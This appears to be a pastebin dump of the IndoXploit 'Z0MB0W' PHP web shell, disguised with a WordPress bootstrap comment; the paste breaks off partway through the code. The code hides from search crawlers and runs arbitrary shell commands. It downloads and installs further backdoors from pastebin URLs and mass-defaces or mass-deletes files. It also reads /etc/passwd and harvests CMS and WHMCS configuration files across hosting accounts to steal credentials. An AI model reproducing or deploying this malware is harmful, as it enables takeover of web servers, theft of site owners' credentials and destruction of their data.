· 6 years ago · May 01, 2019, 08:22 PM
1Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
2<?php
3
4
5
6
7
8/**
9 * Bootstrap file for setting the ABSPATH constant
10 * and loading the wp-config.php file. The wp-config.php
11 * file will then load the wp-settings.php file, which
12 * will then set up the WordPress environment.
13 *
14 * If the wp-config.php file is not found then an error
15 * will be displayed asking the visitor to set up the
16 * wp-config.php file.
17 *
18 * Will also search for wp-config.php in WordPress' parent
19 * directory to allow the WordPress directory to remain
20 * untouched.
21 *
22 * @package WordPress
23 */
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75session_start();
76@error_reporting(0);
77@set_time_limit(0);
78
79if(version_compare(PHP_VERSION, '5.3.0', '<')) {
80 @set_magic_quotes_runtime(0);
81}
82
83@clearstatcache();
84@ini_set('error_log',NULL);
85@ini_set('log_errors',0);
86@ini_set('max_execution_time',0);
87@ini_set('output_buffering',0);
88@ini_set('display_errors', 0);
89
90$password = "e5c8009481f3dbd0d1cec65d8e582d9b"; # md5: p@ssword*-*bb
91
92$SERVERIP = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
93$FILEPATH = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
94
95if(!empty($_SERVER['HTTP_USER_AGENT'])) {
96 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
97 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
98 header('HTTP/1.0 404 Not Found');
99 exit;
100 }
101}
102
103function login_shell() {
104?>
105<!DOCTYPE HTML>
106<html>
107<head>
108<title>Z0MB0W</title>
109<style type="text/css">
110html {
111 margin: 20px auto;
112 background: #000000;
113 color: green;
114 text-align: center;
115}
116header {
117 color: green;
118 margin: 10px auto;
119}
120input[type=password] {
121 width: 250px;
122 height: 25px;
123 color: red;
124 background: transparent;
125 border: 1px dotted green;
126 margin-left: 20px;
127 text-align: center;
128}
129</style>
130</head>
131<center>
132<header>
133 <pre>
134 ___________________________
135< we1C0me!:~# MR.Z0MB0W >
136 ---------------------------
137????? ??? ????? ??? ??? ?????
138????? ??? ????? ??? ??? ?????
139????? ??? ????? ??? ??? ?????
140 ___________________________
141 </pre>
142</header>
143<form method="post">
144<input type="password" name="password">
145</form>
146<?php
147exit;
148}
149
150if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
151 if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
152 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
153 else
154 login_shell();
155
156if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
157 @ob_clean();
158 $file = $_GET['file'];
159 header('Content-Description: File Transfer');
160 header('Content-Type: application/octet-stream');
161 header('Content-Disposition: attachment; filename="'.basename($file).'"');
162 header('Expires: 0');
163 header('Cache-Control: must-revalidate');
164 header('Pragma: public');
165 header('Content-Length: ' . filesize($file));
166 readfile($file);
167 exit;
168}
169
170if(get_magic_quotes_gpc()) {
171 function idx_ss($array) {
172 return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
173 }
174 $_POST = idx_ss($_POST);
175}
176?>
177<!DOCTYPE HTML>
178<html>
179<!--
180###############################################################################
181// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
182// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
183// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
184// Tanpa kalian kita tidak akan BESAR seperti sekarang.
185// Greetz: All Member IndoXploit. & All My Friends.
186###############################################################################
187// Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
188###############################################################################
189-->
190<head>
191<title>Z0MB0W</title>
192<meta name='author' content='IndoXploit'>
193<meta charset="UTF-8">
194<style type='text/css'>
195@import url(https://fonts.googleapis.com/css?family=Ubuntu);
196html {
197 background: #000000;
198 color: #ffffff;
199 font-size: 14px;
200 width: 100%;
201}
202
203li {
204 display: inline;
205 margin: 5px;
206 padding: 5px;
207}
208
209a {
210 color: #ffffff;
211 text-decoration: none;
212}
213
214a:hover {
215 color: gold;
216 text-decoration: underline;
217}
218
219b {
220 color: gold;
221}
222
223pre {
224 font-size: 13px;
225}
226
227table, th, td {
228 border-collapse:collapse;
229 background: transparent;
230 font-family: 'Ubuntu';
231 font-size: 13px;
232}
233
234.table_home, .th_home, .td_home {
235 border: 1px solid #ffffff;
236}
237
238.th_home {
239 color: lime;
240}
241
242.td_home, .td_home > a {
243 color: #ffffff;
244}
245
246.td_home > a:hover {
247 color: gold;
248}
249
250th {
251 padding: 10px;
252}
253
254tr:hover {
255 background: #006400;
256 color: #ffffff;
257}
258
259input[type=text], input[type=password], .input {
260 background: transparent;
261 color: #ffffff;
262 border: 1px solid #ffffff;
263 padding: 3px;
264 font-family: 'Ubuntu';
265 font-size: 13px;
266}
267
268input[type=submit] {
269 padding: 2px;}
270
271input[type=submit]:hover {
272 cursor: pointer;
273}
274
275input:focus, textarea:focus {
276 outline: 0;
277 border-color: #ffffff;
278}
279
280textarea {
281 border: 1px solid #ffffff;
282 width: 100%;
283 height: 400px;
284 padding-left: 5px;
285 margin: 10px auto;
286 resize: none;
287 background: transparent;
288 color: #ffffff;
289 font-family: 'Ubuntu';
290 font-size: 13px;
291}
292iframe {
293 width: 100%;
294 min-height: 500px;
295}
296</style>
297</head>
298<body>
299<?php
300function path() {
301 if(isset($_GET['dir'])) {
302 $dir = str_replace("\\", "/", $_GET['dir']);
303 @chdir($dir);
304 } else {
305 $dir = str_replace("\\", "/", getcwd());
306 }
307 return $dir;
308}
309
310function color($bold = 1, $colorid = null, $string = null) {
311 $color = array(
312 "</font>", # 0 off
313 "<font color='red'>", # 1 red
314 "<font color='lime'>", # 2 lime
315 "<font color='white'>", # 3 white
316 "<font color='gold'>", # 4 gold
317 );
318
319 return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
320}
321
322function OS() {
323 return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
324}
325
326function exe($cmd) {
327 if(function_exists('system')) {
328 @ob_start();
329 @system($cmd);
330 $buff = @ob_get_contents();
331 @ob_end_clean();
332 return $buff;
333 } elseif(function_exists('exec')) {
334 @exec($cmd,$results);
335 $buff = "";
336 foreach($results as $result) {
337 $buff .= $result;
338 } return $buff;
339 } elseif(function_exists('passthru')) {
340 @ob_start();
341 @passthru($cmd);
342 $buff = @ob_get_contents();
343 @ob_end_clean();
344 return $buff;
345 } elseif(function_exists('shell_exec')) {
346 $buff = @shell_exec($cmd);
347 return $buff;
348 }
349}
350
351function save($filename, $mode, $file) {
352 $handle = fopen($filename, $mode);
353 fwrite($handle, $file);
354 fclose($handle);
355 return;
356}
357
358function getfile($name) {
359 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
360 if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
361 elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
362 elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
363 elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
364 elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
365
366 $fp = fopen($get[1], "w");
367 $ch = curl_init();
368 curl_setopt($ch, CURLOPT_URL, $get[0]);
369 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
370 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
371 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
372 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
373 curl_setopt($ch, CURLOPT_FILE, $fp);
374 return curl_exec($ch);
375 curl_close($ch);
376 fclose($fp);
377 ob_flush();
378 flush();
379}
380
381function usergroup() {
382 if(!function_exists('posix_getegid')) {
383 $user['name'] = @get_current_user();
384 $user['uid'] = @getmyuid();
385 $user['gid'] = @getmygid();
386 $user['group'] = "?";
387 } else {
388 $user['uid'] = @posix_getpwuid(posix_geteuid());
389 $user['gid'] = @posix_getgrgid(posix_getegid());
390 $user['name'] = $user['uid']['name'];
391 $user['uid'] = $user['uid']['uid'];
392 $user['group'] = $user['gid']['name'];
393 $user['gid'] = $user['gid']['gid'];
394 }
395 return (object) $user;
396}
397
398function getuser() {
399 $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
400 while($read = fgets($fopen)) {
401 preg_match_all('/(.*?):x:/', $read, $getuser);
402 $user[] = $getuser[1][0];
403 }
404 return $user;
405}
406
407function getdomainname() {
408 $fopen = fopen("/etc/named.conf", "r");
409 while($read = fgets($fopen)) {
410 preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
411 $domain[] = $getdomain[1][0];
412 }
413 return $domain;
414}
415
416function hddsize($size) {
417 if($size >= 1073741824)
418 return sprintf('%1.2f',$size / 1073741824 ).' GB';
419 elseif($size >= 1048576)
420 return sprintf('%1.2f',$size / 1048576 ) .' MB';
421 elseif($size >= 1024)
422 return sprintf('%1.2f',$size / 1024 ) .' KB';
423 else
424 return $size .' B';
425}
426
427function hdd() {
428 $hdd['size'] = hddsize(disk_total_space("/"));
429 $hdd['free'] = hddsize(disk_free_space("/"));
430 $hdd['used'] = $hdd['size'] - $hdd['free'];
431 return (object) $hdd;
432}
433
434function writeable($path, $perms) {
435 return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
436}
437
438function perms($path) {
439 $perms = fileperms($path);
440 if (($perms & 0xC000) == 0xC000) {
441 // Socket
442 $info = 's';
443 }
444 elseif (($perms & 0xA000) == 0xA000) {
445 // Symbolic Link
446 $info = 'l';
447 }
448 elseif (($perms & 0x8000) == 0x8000) {
449 // Regular
450 $info = '-';
451 }
452 elseif (($perms & 0x6000) == 0x6000) {
453 // Block special
454 $info = 'b';
455 }
456 elseif (($perms & 0x4000) == 0x4000) {
457 // Directory
458 $info = 'd';
459 }
460 elseif (($perms & 0x2000) == 0x2000) {
461 // Character special
462 $info = 'c';
463 }
464 elseif (($perms & 0x1000) == 0x1000) {
465 // FIFO pipe
466 $info = 'p';
467 }
468 else {
469 // Unknown
470 $info = 'u';
471 }
472 // Owner
473 $info .= (($perms & 0x0100) ? 'r' : '-');
474 $info .= (($perms & 0x0080) ? 'w' : '-');
475 $info .= (($perms & 0x0040) ?
476 (($perms & 0x0800) ? 's' : 'x' ) :
477 (($perms & 0x0800) ? 'S' : '-'));
478 // Group
479 $info .= (($perms & 0x0020) ? 'r' : '-');
480 $info .= (($perms & 0x0010) ? 'w' : '-');
481 $info .= (($perms & 0x0008) ?
482 (($perms & 0x0400) ? 's' : 'x' ) :
483 (($perms & 0x0400) ? 'S' : '-'));
484 // World
485 $info .= (($perms & 0x0004) ? 'r' : '-');
486 $info .= (($perms & 0x0002) ? 'w' : '-');
487 $info .= (($perms & 0x0001) ?
488 (($perms & 0x0200) ? 't' : 'x' ) :
489 (($perms & 0x0200) ? 'T' : '-'));
490
491 return $info;
492}
493
494function lib_installed() {
495 $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
496 $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
497 $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
498 $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
499 $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
500 return implode(" | ", $lib);
501}
502
503function pwd() {
504 $dir = explode("/", path());
505 foreach($dir as $key => $index) {
506 print "<a href='?dir=";
507 for($i = 0; $i <= $key; $i++) {
508 print $dir[$i];
509 if($i != $key) {
510 print "/";
511 }
512 }
513 print "'>$index</a>/";
514 }
515 print "<br>";
516 print (OS() === "Windows") ? windisk() : "";
517}
518
519function windisk() {
520 $letters = "";
521 $v = explode("\\", path());
522 $v = $v[0];
523 foreach(range("A", "Z") as $letter) {
524 $bool = $isdiskette = in_array($letter, array("A"));
525 if(!$bool) $bool = is_dir("$letter:\\");
526 if($bool) {
527 $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
528 if($letter.":" != $v) {
529 $letters .= $letter;
530 }
531 else {
532 $letters .= color(1, 2, $letter);
533 }
534 $letters .= "</a> ]";
535 }
536 }
537 if(!empty($letters)) {
538 print "Detected Drives $letters<br>";
539 }
540 if(count($quicklaunch) > 0) {
541 foreach($quicklaunch as $item) {
542 $v = realpath(path(). "..");
543 if(empty($v)) {
544 $a = explode(DIRECTORY_SEPARATOR,path());
545 unset($a[count($a)-2]);
546 $v = join(DIRECTORY_SEPARATOR, $a);
547 }
548 print "<a href='".$item[1]."'>".$item[0]."</a>";
549 }
550 }
551}
552
553function serverinfo() {
554 $disable_functions = @ini_get('disable_functions');
555 $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
556
557 $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
558 $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
559 $output[] = "SYSTEM : ".color(1, 2, php_uname());
560 $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
561 $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
562 $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
563 $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
564 $output[] = "DISABLE FUNC: $disable_functions";
565 $output[] = lib_installed();
566 $output[] = "Current Dir (".writeable(path(), perms(path())).") ";
567
568 print "<pre>";
569 print implode("<br>", $output);
570 pwd();
571 print "</pre>";
572
573}
574
575function curl($url, $post = false, $data = null) {
576 $ch = curl_init($url);
577 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
578 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
579 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
580 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
581 curl_setopt($ch, CURLOPT_TIMEOUT, 10);
582 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
583 if($post) {
584 curl_setopt($ch, CURLOPT_POST, true);
585 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
586 }
587 return curl_exec($ch);
588 curl_close($ch);
589}
590
591function reverse() {
592 $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
593 $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
594 $explode = explode(",,", $response);
595 unset($explode[0]);
596
597 foreach($explode as $domain) {
598 $domain = "http://$domain";
599 $domain = str_replace(",", "", $domain);
600 $url[] = $domain;
601 ob_flush();
602 flush();
603 }
604
605 return $url;
606}
607
608function getValue($param, $kata1, $kata2){
609 if(strpos($param, $kata1) === FALSE) return FALSE;
610 if(strpos($param, $kata2) === FALSE) return FALSE;
611 $start = strpos($param, $kata1) + strlen($kata1);
612 $end = strpos($param, $kata2, $start);
613 $return = substr($param, $start, $end - $start);
614 return $return;
615}
616
617function massdeface($dir, $file, $filename, $type = null) {
618 $scandir = scandir($dir);
619 foreach($scandir as $dir_) {
620 $path = "$dir/$dir_";
621 $location = "$path/$filename";
622 if($dir_ === "." || $dir_ === "..") {
623 file_put_contents($location, $file);
624 }
625 else {
626 if(is_dir($path) AND is_writable($path)) {
627 print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
628 file_put_contents($location, $file);
629 if($type === "-alldir") {
630 massdeface($path, $file, $filename, "-alldir");
631 }
632 }
633 }
634 }
635}
636
637function massdelete($dir, $filename) {
638 $scandir = scandir($dir);
639 foreach($scandir as $dir_) {
640 $path = "$dir/$dir_";
641 $location = "$path/$filename";
642 if($dir_ === '.') {
643 if(file_exists("$dir/$filename")) {
644 unlink("$dir/$filename");
645 }
646 }
647 elseif($dir_ === '..') {
648 if(file_exists(dirname($dir)."/$filename")) {
649 unlink(dirname($dir)."/$filename");
650 }
651 }
652 else {
653 if(is_dir($path) AND is_writable($path)) {
654 if(file_exists($location)) {
655 print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
656 unlink($location);
657 massdelete($path, $filename);
658 }
659 }
660 }
661 }
662}
663
664function tools($toolsname, $args = null) {
665 if($toolsname === "cmd") {
666 print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
667 ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
668 <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
669 <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
670 </form>";
671 }
672 elseif($toolsname === "readfile") {
673 if(empty($args)) die(color(1, 1, $msg));
674 if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
675
676 print "<pre>";
677 print htmlspecialchars(file_get_contents($args));
678 print "</pre>";
679 }
680 elseif($toolsname === "spawn") {
681 if($args === "adminer") {
682 if(file_exists("adminer.php")) {
683 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
684 }
685 else {
686 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
687 if(getfile("adminer")) {
688 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
689 }
690 else {
691 print color(1, 1, "Error while downloading file Adminer.");
692 @unlink("adminer.php");
693 }
694 }
695 }
696 elseif($args === "webconsole") {
697 if(file_exists("webconsole.php")) {
698 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
699 }
700 else {
701 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
702 if(getfile("webconsole")) {
703 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
704 }
705 else {
706 print color(1, 1, "Error while downloading file WebConsole.");
707 @unlink("webconsole.php");
708 }
709 }
710 }
711 elseif($args === "cgitelnet1") {
712 if(file_exists("idx_cgi/cgitelnet1.idx")) {
713 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
714 }
715 elseif(file_exists('cgitelnet1.idx')) {
716 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
717 }
718 else {
719 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
720 if(!is_dir(path()."/idx_cgi/")) {
721 @mkdir('idx_cgi', 0755);
722 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
723 }
724 if(getfile("cgitelnet1")) {
725 chmod('idx_cgi/cgitelnet1.idx', 0755);
726 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
727 }
728 else {
729 print color(1, 1, "Error while downloading file CGI Telnet.");
730 @rmdir(path()."/idx_cgi/");
731 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
732 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
733 }
734 }
735
736 }
737 elseif($args === "cgitelnet2") {
738 if(file_exists("idx_cgi/cgitelnet2.idx")) {
739 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
740 }
741 elseif(file_exists('cgitelnet2.idx')) {
742 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
743 }
744 else {
745 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
746 if(!is_dir(path()."/idx_cgi/")) {
747 @mkdir('idx_cgi', 0755);
748 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
749 }
750 if(getfile("cgitelnet2")) {
751 chmod('idx_cgi/cgitelnet2.idx', 0755);
752 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
753 }
754 else {
755 print color(1, 1, "Error while downloading file CGI Telnet.");
756 @rmdir(path()."/idx_cgi/");
757 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
758 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
759 }
760 }
761
762 }
763 elseif($args === "phpinfo") {
764 if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
765 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
766 }
767 else {
768 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
769 save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style=\'background: #000000; color: #cccccc;\'>'; phpinfo(); print '</div></html>'; ?>");
770 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
771 }
772 }
773 }
774 elseif($toolsname === "upload") {
775 if($_POST['upload']) {
776 if($_POST['uploadtype'] === '1') {
777 if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
778 $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
779 }
780 else {
781 $act = color(1, 1, "Failed to upload file!");
782 }
783 }
784 elseif($_POST['uploadtype'] === '2') {
785 $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
786 $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
787 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
788 if(@copy($_FILES['file']['tmp_name'], $root)) {
789 $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
790 }
791 else {
792 $act = color(1, 1, "Failed to upload file!");
793 }
794 }
795 else {
796 $act = color(1, 1, "Failed to upload file!");
797 }
798 }
799 }
800 print "Upload File: $act
801 <form method='post' enctype='multipart/form-data'>
802 <input type='radio' name='uploadtype' value='1' checked>current_dir [ ".writeable(path(), "Writeable")." ]
803 <input type='radio' name='uploadtype' value='2'>document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
804 <input type='file' name='file'>
805 <input type='submit' value='upload' name='upload'>
806 </form>";
807 }
808 elseif($toolsname === "jumping") {
809 $i = 0;
810 foreach(getuser() as $user) {
811 $path = "/home/$user/public_html";
812 if(is_readable($path)) {
813 $status = color(1, 2, "[R]");
814 if(is_writable($path)) {
815 $status = color(1, 2, "[RW]");
816 }
817 $i++;
818 print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
819 if(!function_exists('posix_getpwuid')) print "<br>";
820 if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
821 foreach(getdomainname() as $domain) {
822 $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
823 $userdomain = $userdomain->name;
824 if($userdomain === $user) {
825 print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
826 break;
827 }
828 }
829 }
830 }
831 print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
832 }
833 elseif($toolsname === "idxconfig") {
834 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
835 if(!is_dir(path()."/idx_config/")) {
836 @mkdir('idx_config', 0755);
837 $htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
838 save("idx_config/.htaccess","w", $htaccess);
839
840 foreach(getuser() as $user) {
841 $user_docroot = "/home/$user/public_html/";
842 if(is_readable($user_docroot)) {
843 $getconfig = array(
844 "/home/$user/.accesshash" => "WHM-accesshash",
845 "$user_docroot/config/koneksi.php" => "Lokomedia",
846 "$user_docroot/forum/config.php" => "phpBB",
847 "$user_docroot/sites/default/settings.php" => "Drupal",
848 "$user_docroot/config/settings.inc.php" => "PrestaShop",
849 "$user_docroot/app/etc/local.xml" => "Magento",
850 "$user_docroot/admin/config.php" => "OpenCart",
851 "$user_docroot/application/config/database.php" => "Ellislab",
852 "$user_docroot/vb/includes/config.php" => "Vbulletin",
853 "$user_docroot/includes/config.php" => "Vbulletin",
854 "$user_docroot/forum/includes/config.php" => "Vbulletin",
855 "$user_docroot/forums/includes/config.php" => "Vbulletin",
856 "$user_docroot/cc/includes/config.php" => "Vbulletin",
857 "$user_docroot/inc/config.php" => "MyBB",
858 "$user_docroot/includes/configure.php" => "OsCommerce",
859 "$user_docroot/shop/includes/configure.php" => "OsCommerce",
860 "$user_docroot/os/includes/configure.php" => "OsCommerce",
861 "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
862 "$user_docroot/products/includes/configure.php" => "OsCommerce",
863 "$user_docroot/cart/includes/configure.php" => "OsCommerce",
864 "$user_docroot/inc/conf_global.php" => "IPB",
865 "$user_docroot/wp-config.php" => "Wordpress",
866 "$user_docroot/wp/test/wp-config.php" => "Wordpress",
867 "$user_docroot/blog/wp-config.php" => "Wordpress",
868 "$user_docroot/beta/wp-config.php" => "Wordpress",
869 "$user_docroot/portal/wp-config.php" => "Wordpress",
870 "$user_docroot/site/wp-config.php" => "Wordpress",
871 "$user_docroot/wp/wp-config.php" => "Wordpress",
872 "$user_docroot/WP/wp-config.php" => "Wordpress",
873 "$user_docroot/news/wp-config.php" => "Wordpress",
874 "$user_docroot/wordpress/wp-config.php" => "Wordpress",
875 "$user_docroot/test/wp-config.php" => "Wordpress",
876 "$user_docroot/demo/wp-config.php" => "Wordpress",
877 "$user_docroot/home/wp-config.php" => "Wordpress",
878 "$user_docroot/v1/wp-config.php" => "Wordpress",
879 "$user_docroot/v2/wp-config.php" => "Wordpress",
880 "$user_docroot/press/wp-config.php" => "Wordpress",
881 "$user_docroot/new/wp-config.php" => "Wordpress",
882 "$user_docroot/blogs/wp-config.php" => "Wordpress",
883 "$user_docroot/configuration.php" => "Joomla",
884 "$user_docroot/blog/configuration.php" => "Joomla",
885 "$user_docroot/submitticket.php" => "^WHMCS",
886 "$user_docroot/cms/configuration.php" => "Joomla",
887 "$user_docroot/beta/configuration.php" => "Joomla",
888 "$user_docroot/portal/configuration.php" => "Joomla",
889 "$user_docroot/site/configuration.php" => "Joomla",
890 "$user_docroot/main/configuration.php" => "Joomla",
891 "$user_docroot/home/configuration.php" => "Joomla",
892 "$user_docroot/demo/configuration.php" => "Joomla",
893 "$user_docroot/test/configuration.php" => "Joomla",
894 "$user_docroot/v1/configuration.php" => "Joomla",
895 "$user_docroot/v2/configuration.php" => "Joomla",
896 "$user_docroot/joomla/configuration.php" => "Joomla",
897 "$user_docroot/new/configuration.php" => "Joomla",
898 "$user_docroot/WHMCS/submitticket.php" => "WHMCS",
899 "$user_docroot/whmcs1/submitticket.php" => "WHMCS",
900 "$user_docroot/Whmcs/submitticket.php" => "WHMCS",
901 "$user_docroot/whmcs/submitticket.php" => "WHMCS",
902 "$user_docroot/whmcs/submitticket.php" => "WHMCS",
903 "$user_docroot/WHMC/submitticket.php" => "WHMCS",
904 "$user_docroot/Whmc/submitticket.php" => "WHMCS",
905 "$user_docroot/whmc/submitticket.php" => "WHMCS",
906 "$user_docroot/WHM/submitticket.php" => "WHMCS",
